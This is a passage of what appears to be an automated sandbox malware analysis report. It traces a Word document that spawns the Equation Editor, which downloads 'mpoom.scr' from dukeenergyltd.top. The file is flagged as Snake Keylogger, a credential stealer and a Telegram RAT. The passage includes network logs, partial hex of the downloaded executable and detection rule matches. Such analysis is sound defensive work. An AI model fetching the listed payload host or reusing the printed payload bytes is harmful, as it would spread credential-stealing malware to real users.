Apr 23, 2024 07:49:59.507497072 CEST	62751	53	192.168.2.22	8.8.8.8
Apr 23, 2024 07:49:59.595150948 CEST	53	62751	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 23, 2024 07:49:56.673778057 CEST	192.168.2.22	8.8.8.8	0xe3cd	Standard query (0)	dukeenergyltd.top	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:49:59.261459112 CEST	192.168.2.22	8.8.8.8	0xade5	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:49:59.507497072 CEST	192.168.2.22	8.8.8.8	0x4465	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 23, 2024 07:49:56.782021999 CEST	8.8.8.8	192.168.2.22	0xe3cd	No error (0)	dukeenergyltd.top		172.67.134.136	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:49:56.782021999 CEST	8.8.8.8	192.168.2.22	0xe3cd	No error (0)	dukeenergyltd.top		104.21.25.202	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:49:59.352401972 CEST	8.8.8.8	192.168.2.22	0xade5	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 07:49:59.352401972 CEST	8.8.8.8	192.168.2.22	0xade5	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:49:59.352401972 CEST	8.8.8.8	192.168.2.22	0xade5	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:49:59.352401972 CEST	8.8.8.8	192.168.2.22	0xade5	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:49:59.352401972 CEST	8.8.8.8	192.168.2.22	0xade5	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:49:59.352401972 CEST	8.8.8.8	192.168.2.22	0xade5	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:49:59.595150948 CEST	8.8.8.8	192.168.2.22	0x4465	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 07:49:59.595150948 CEST	8.8.8.8	192.168.2.22	0x4465	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:49:59.595150948 CEST	8.8.8.8	192.168.2.22	0x4465	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:49:59.595150948 CEST	8.8.8.8	192.168.2.22	0x4465	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:49:59.595150948 CEST	8.8.8.8	192.168.2.22	0x4465	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:49:59.595150948 CEST	8.8.8.8	192.168.2.22	0x4465	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dukeenergyltd.top

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49162	193.122.6.168	80	3248	C:\Users\user\AppData\Roaming\mpoom39002.scr

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 07:49:59.788209915 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 23, 2024 07:50:00.892457008 CEST	323	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 05:50:00 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ac5b01eef868e899a11d120acb7331cf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 31 36 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.163</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	172.67.134.136	443	2160	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
2024-04-23 05:49:57 UTC	313	OUT	GET /mpoom.scr HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: dukeenergyltd.top Connection: Keep-Alive
2024-04-23 05:49:57 UTC	775	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 05:49:57 GMT Content-Type: application/x-silverlight Content-Length: 331264 Connection: close Last-Modified: Tue, 23 Apr 2024 00:00:26 GMT ETag: "50e00-616b83dbfcf20" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aPZro9ctiIG9vVItEJYNoqQHzbMp6h0XiKmbLYZRQu%2FKT8lXM078E%2BVBFB2OP6HMQQkDNDCgdGFg%2Bea8UO1DH6ipt1r1PlSQE7irX3ib8MTP78djA885YmiOZqcyRwm%2FQnWHrw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; includeSubDomains; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 878b92c05af278d9-EWR alt-svc: h3=":443"; ma=86400
2024-04-23 05:49:57 UTC	594	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 de 0d 14 9f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 02 05 00 00 0a 00 00 00 00 00 00 fe 20 05 00 00 20 00 00 00 40 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0 @@ @
2024-04-23 05:49:57 UTC	1369	IN	Data Raw: 28 14 00 00 0a 00 00 02 72 01 00 00 70 73 15 00 00 0a 7d 01 00 00 04 02 73 16 00 00 0a 7d 02 00 00 04 2a 72 00 02 7b 02 00 00 04 17 6f 17 00 00 0a 00 02 7b 02 00 00 04 03 6f 18 00 00 0a 00 2a 56 00 02 7b 02 00 00 04 6f 20 00 00 0a 03 04 6f 21 00 00 0a 26 2a 22 02 28 14 00 00 0a 00 2a b2 28 23 00 00 06 80 04 00 00 04 28 26 00 00 0a 7e 04 00 00 04 28 0c 00 00 06 6f 27 00 00 0a 6f 28 00 00 0a 1f 23 9a 80 05 00 00 04 2a 4a 00 7e 05 00 00 04 74 29 00 00 01 28 29 00 00 0a 26 2a 26 02 28 14 00 00 0a 00 00 2a 22 00 02 80 07 00 00 04 2a 13 30 01 00 0c 00 00 00 01 00 00 11 00 02 7b 03 00 00 04 0a 2b 00 06 2a 1b 30 02 00 39 00 00 00 02 00 00 11 00 02 7b 02 00 00 04 02 7b 01 00 00 04 6f 19 00 00 0a 00 00 02 7b 01 00 00 04 6f 1a 00 00 0a 00 02 02 7b 02 00 00 04 6f 1b Data Ascii: (rps}s}r{o{oV{o o!&"((#(&~(o'o(#J~t)()&&("0{+*09{{o{o{o
2024-04-23 05:49:57 UTC	1369	IN	Data Raw: 00 06 72 36 04 00 70 03 6f 08 00 00 06 00 06 72 c8 04 00 70 03 6f 08 00 00 06 00 06 6f 05 00 00 06 00 00 de 04 0b 00 07 7a de 0a 00 06 6f 09 00 00 06 00 00 dc 2a 00 00 00 01 1c 00 00 00 00 07 00 31 38 00 04 1e 00 00 01 02 00 07 00 37 3e 00 0a 00 00 00 00 1b 30 03 00 41 00 00 00 06 00 00 11 00 73 02 00 00 06 0a 00 06 72 d0 04 00 70 6f 03 00 00 06 00 06 72 24 03 00 70 03 8c 26 00 00 01 6f 08 00 00 06 00 06 6f 05 00 00 06 00 00 de 04 0b 00 07 7a de 0a 00 06 6f 09 00 00 06 00 00 dc 2a 00 00 00 01 1c 00 00 00 00 07 00 29 30 00 04 1e 00 00 01 02 00 07 00 2f 36 00 0a 00 00 00 00 1b 30 02 00 42 00 00 00 08 00 00 11 00 73 02 00 00 06 0a 00 06 72 1c 05 00 70 6f 03 00 00 06 00 06 6f 04 00 00 06 00 2b 02 00 00 06 6f 01 00 00 06 6f 25 00 00 0a 0b 07 2d ef 00 de 04 0c Data Ascii: r6porpoozo187>0Asrpor$p&oozo)0/60Bsrpoo+oo%-
2024-04-23 05:49:57 UTC	1369	IN	Data Raw: 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 Data Ascii: oxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXv
2024-04-23 05:49:57 UTC	1369	IN	Data Raw: 44 6f 78 b4 b7 72 ca 45 4d 46 45 6f 37 4a 1e 76 39 45 04 46 1a 6f 36 4a 17 76 3e 45 1e 46 17 6f 3d 4a 0e 76 28 45 1e 46 13 6f 78 4a 6c 75 f7 45 4d 46 45 6f 78 4a 58 76 77 46 cd 46 40 6f 20 4a 58 76 3f 45 4d 46 45 6f 79 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 c5 4d 46 75 6f 78 4a 59 76 76 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 ef 78 4a 40 76 77 45 5d 46 44 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 Data Ascii: DoxrEMFEo7Jv9EFo6Jv>EFo=Jv(EFoxJluEMFEoxJXvwFF@o JXv?EMFEoyJXvwEMFEoxJXvwMFuoxJYvvEMFEoxJXvwEMFExJ@vwE]FDoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJX
2024-04-23 05:49:57 UTC	1369	IN	Data Raw: 4c 79 ee 6a 4b 71 64 62 42 4f 44 47 6d 7a 4f 5f 71 4b c4 5f 47 11 ee 6a 5f 59 b7 f7 57 58 47 4f 60 44 cb 4a 77 23 c4 5f 53 44 ae f8 58 4d 4a f6 57 4c 12 c4 7d 6d 4b 99 f6 65 50 71 c7 57 6e 2c cb 4a 63 76 84 cd 54 50 6c 7f 63 c5 f5 66 d8 ce 57 e4 ed 6a 4b 5b 56 7b d8 ce 57 d8 ed 6a 9f d8 64 79 44 49 66 48 f2 fb 5b c5 f5 66 e4 cf 54 dc ed 6a 97 d8 67 8a c4 5c 1f 54 d6 f8 58 50 71 6e e4 cf 54 1c 7e d9 c8 4a ef f5 57 f4 c6 57 6a 7f 5a f9 f4 65 1c 5c e7 c7 7d c1 ca 4a 72 70 48 14 57 e4 ed 6a 93 da 64 2e 54 d4 c4 57 ce fa 58 f9 f4 65 1c 5c df c7 7d e1 c8 4a 7e d2 c5 5c e3 c5 7e dd ca 49 2f 66 fc cd 54 55 68 54 13 49 ef f5 57 4f 1f 54 f6 fa 58 e1 f6 65 43 4a 56 47 67 7a 48 50 74 75 47 45 44 47 67 7a 48 5a 74 2e 54 45 4e 24 7e 6c 4d 40 1b f5 54 20 c4 54 6d 7f 42 Data Ascii: LyjKqdbBODGmzO_qK_Gj_YWXGO`DJw#_SDXMJWL}mKePqWn,JcvTPlcfWjK[V{WjdyDIfH[fTjg\TXPqnT~JWWjZe\}JrpHWjd.TWXe\}J~\~I/fTUhTIWOTXeCJVGgzHPtuGEDGgzHZt.TEN$~lM@T TmB
2024-04-23 05:49:57 UTC	1369	IN	Data Raw: 5c 4e 4d 64 7f 52 45 f7 66 24 5c 8b c5 7d 79 49 78 7d 46 57 4f 44 1c 7e 7a 2b 49 70 70 4e 98 c4 57 6f 58 4f 09 f7 65 74 5f 44 74 7d ad c8 4a 73 70 48 5c c5 57 6e 79 6a 5e 7b f4 57 4c 47 65 69 88 ca 4a 77 6e c4 5f 53 4d 72 f9 5b 59 71 72 98 cd 57 44 68 7d ba d8 64 76 42 48 b6 c5 7d 79 53 d9 64 62 44 4a 4c 2c 7d 79 4b 78 73 6b 4b 4c 46 41 67 64 4b 78 72 72 c6 5c 46 65 6a a1 c8 4a 2f 66 4d d4 c4 57 61 7a d3 da 64 75 e0 cd 57 e0 ef 69 13 49 cf f7 57 41 41 59 4a 6a f3 d8 64 76 45 4a 9f c7 7d 70 d3 da 64 2e 54 ec c4 57 f6 fa 58 5a ab f7 54 43 e3 c5 7e dd ca 49 d3 f7 54 14 57 fc ef 6a 13 49 74 67 42 6a 1f 54 b6 fa 58 c1 f4 65 1c 5c df c7 7d 7a 13 49 d7 f5 57 d4 c4 57 6d 7a 48 5a ab f7 54 e8 c6 54 ca f8 5b fd f6 66 4d 14 57 fc ef 6a 5e 5f 58 76 c4 5c 47 42 6a 85 Data Ascii: \NMdREf$\}yIx}FWOD~z+IppNWoXOet_Dt}JspH\Wnyj^{WLGeiJwn_SMr[YqrWDh}dvBH}ySdbDJL,}yKxskKLFAgdKxrr\FejJ/fMWazduWiIWAAYJjdvEJ}pd.TWXZTC~ITWjItgBjTXe\}zIWWmzHZTT[fMWj^_Xv\GBj
2024-04-23 05:49:57 UTC	1369	IN	Data Raw: 55 14 57 ac ed 69 4b 58 71 92 c7 5c 47 44 4f 7e ab da 67 76 44 6d 40 98 ed 69 4b 59 56 71 4d 45 63 57 6e 7b 6a 5f 74 2e 54 14 57 dc ed 6a 48 f9 f4 65 47 d4 c4 57 6d 7a 13 49 7e d2 c5 5c 9f c7 7d 70 ef d8 67 75 47 14 57 56 68 5d d3 da 64 2e 54 14 57 dc ed 6a 13 49 d3 f7 54 4f 44 47 cf f8 58 f8 f6 65 c5 cd 54 47 fe fa 5b 4d ef f5 57 4f df c7 7d c1 ca 4a 79 70 69 cd c6 57 ef f8 58 59 2f f5 54 58 44 42 62 f8 ca 4a f6 f7 57 4c 1f c7 7e 6d 48 5a 72 70 4a 4f 44 c5 ef 6a 7b 4a 72 70 4c ed c6 57 cf f8 58 d8 f6 65 47 dc c4 54 7a 7a 4d 48 74 75 47 14 57 47 36 69 4c 5f 7c 75 47 4f 1f 54 6d 21 5b f8 f6 65 e5 cd 54 c5 ef 6a 48 c9 f4 66 50 14 57 47 65 7f 51 f8 f6 65 c5 cd 54 47 fe fa 5b 4d 7d d7 c5 5f c6 c5 7d 7a c7 da 64 62 4e ed c6 57 6e 51 58 4d 71 75 45 53 44 f8 ef Data Ascii: UWiKXq\GDO~gvDm@iKYVqMEcWn{j_t.TWjHeGWmzI~\}pguGWVh]d.TWjITODGXeTG[MWO}JypiWXY/TXDBbJWL~mHZrpJODj{JrpLWXeGTzzMHtuGWG6iL_\|uGOTm![eTjHfPWGeQeTG[M}_}zdbNWnQXMquESD
2024-04-23 05:49:57 UTC	1369	IN	Data Raw: 75 47 4f 44 88 ef 6a 45 5f 63 cb c5 5f c2 c5 7d 7a db da 67 62 4e f1 c6 57 eb f8 58 5a fb f5 57 58 4d 24 7e 7a 4b 78 73 cf c5 5f d2 c5 7d 7a db da 67 62 4e f5 c6 57 fb f8 58 5a fb f5 57 58 4d 24 7e 78 4a 5c 74 75 47 4f 44 47 6d 7a 48 5a 74 75 47 4f 44 47 6d 7a 48 e4 f6 65 f9 cd 54 c1 ef 6a 48 c9 f4 66 50 14 57 47 d7 f8 58 e0 f6 65 d1 cd 54 47 fe fa 5b 4d 17 66 5f 4a 70 94 ef 6a 4b 59 76 71 94 cd 54 45 6f 7d 4b 4b 76 64 44 4f 66 42 eb f8 58 59 2f f5 54 58 4e c1 ef 6a 4b 71 64 62 42 4c 55 45 4f 7c de d8 64 0b 54 4f d7 c7 7e 6d 40 59 65 77 56 4f d7 c7 7e 6d 4a 78 7d e3 c5 5f 3a 54 6d f5 c8 4a 63 7d 44 5e 46 56 6d f5 c8 4a 63 77 65 46 d2 c5 7d 04 5b 5a 23 65 50 44 fe c5 7d c4 ca 4a f2 f7 57 c9 c6 57 6e 21 c8 49 63 75 47 d9 c6 57 fb f8 58 24 67 75 d4 cf 57 50 Data Ascii: uGODjE_c_}zgbNWXZWXM$~zKxs_}zgbNWXZWXM$~xJ\tuGODGmzHZtuGODGmzHeTjHfPWGXeTG[Mf_JpjKYvqTEo}KKvdDOfBXY/TXNjKqdbBLUEO\|dTO~m@YewVO~mJx}_:TmJc}D^FVmJcweF}[Z#ePD}JWWn!IcuGWX$guWP
2024-04-23 05:49:57 UTC	1369	IN	Data Raw: 56 19 20 25 31 65 0a 1f 24 39 1e 14 65 21 2a 2a 1d 1b 39 78 1b 02 28 24 3e 24 02 58 2f 30 02 57 36 28 28 2c 02 0a 2f 2c 13 33 76 4d 47 7d 6f 78 64 39 13 05 24 6d 23 29 0d 19 26 34 19 05 26 3e 66 20 07 0c 6a 2a 19 11 65 28 3c 2c 1c 58 3d 3d 1f 01 65 28 2e 11 49 78 4b 73 76 77 45 4d 46 21 6f 79 42 58 76 59 20 2a 28 24 1d 58 2f 34 14 16 29 21 29 37 0c 0b 6a 3d 1e 03 65 2b 29 65 0a 0d 26 39 00 57 31 24 2b 2c 03 58 38 3d 06 07 30 6d 23 2d 3b 56 4a 59 45 77 45 63 23 22 01 19 38 78 13 1b 27 2c 2a 29 00 0a 29 2b 56 12 2d 39 66 23 00 58 2f 2d 1a 16 33 6d 32 2c 02 11 26 78 04 12 32 22 2a 65 0a 10 1e 76 76 76 76 4d 46 6b 1c 0c 24 3d 05 12 37 3d 23 37 4f 16 25 31 02 1e 36 22 36 65 0d 15 3f 30 02 57 29 21 29 37 0c 0b 6a 3d 1e 03 65 39 27 2d 1b 58 2f 2d 1a 16 33 6d 23 Data Ascii: V %1e$9e!*9x($>$X/0W6((,/,3vMG}oxd9$m#)&4&>f je(<,X==e(.IxKsvwEMF!oyBXvY ($X/4)!)7j=e+)e&9W1$+,X8=0m#-;VJYEwEc#"8x',))+V-9f#X/-3m2,&x2"*evvvvMFk$=7=#7O%16"6e?0W)!)7j=e9'-X/-3m#

Target ID:	0
Start time:	07:49:53
Start date:	23/04/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f1c0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	07:49:54
Start date:	23/04/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:49:57
Start date:	23/04/2024
Path:	C:\Users\user\AppData\Roaming\mpoom39002.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\mpoom39002.scr"
Imagebase:	0x260000
File size:	331'264 bytes
MD5 hash:	37383DB5D0AAF3A258780342654AE739
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000005.00000002.346422484.00000000005F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:49:57
Start date:	23/04/2024
Path:	C:\Users\user\AppData\Roaming\mpoom39002.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\mpoom39002.scr"
Imagebase:	0x260000
File size:	331'264 bytes
MD5 hash:	37383DB5D0AAF3A258780342654AE739
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.610871385.0000000002616000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.610871385.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	07:50:16
Start date:	23/04/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Function 0033B860 Relevance: 1.1, Instructions: 1092COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0032F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32f000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78f76ca898e79cbc45879f41596254f71a24cfd604ed32f7b0680a142d3288a5
Instruction ID: 0f9e05aa46237e7af19e8efa78926043603d2640fa7adc2a7f86a33e92f85be5
Opcode Fuzzy Hash: 78f76ca898e79cbc45879f41596254f71a24cfd604ed32f7b0680a142d3288a5
Instruction Fuzzy Hash: 0551A92142E3C15FD307AB3548A65857F719E23280B8E5AEFC0D1DF9E7D119990EC722

Uniqueness

Uniqueness Score: -1.00%

Function 003414C8 Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0032F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32f000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2de92a56cab5c02f2887f7f27bd1a522d552c99a49d67456be5c0f8fb61dd50f
Instruction ID: ae43bc2f894f740b56680de5f1e9ca0e16cd142911538364d8a92651b9ccf7b0
Opcode Fuzzy Hash: 2de92a56cab5c02f2887f7f27bd1a522d552c99a49d67456be5c0f8fb61dd50f
Instruction Fuzzy Hash: 08510E9A80FBC02FE70357701D626853FB46E23258B4F14EBC5C0CF1A3E558AA4AD322

Uniqueness

Uniqueness Score: -1.00%

Function 0034150D Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0032F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32f000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fca50e3c13de1ffc140df2a2b64c020d1bc44d30f4b8295b5cc6b9a0e548df5
Instruction ID: ce28d873cda65fc5df6f372ccc4dd4f584fe7d302baee35110c7d52009bb68d2
Opcode Fuzzy Hash: 5fca50e3c13de1ffc140df2a2b64c020d1bc44d30f4b8295b5cc6b9a0e548df5
Instruction Fuzzy Hash: 5341119A80FBC02EE70357701C626853FB56E63248B4F54DBC5C1CF1B3E558AA4AD722

Uniqueness

Uniqueness Score: -1.00%

Function 0033C0C6 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0032F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32f000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0a55d97cda008e7576dcf22cc24f999d18fe809062c95436ae310a3a2ae0bbd
Instruction ID: 8b52e43557e50531e85bdfe52620085764a6e03a6c26fe12b49f723de267131f
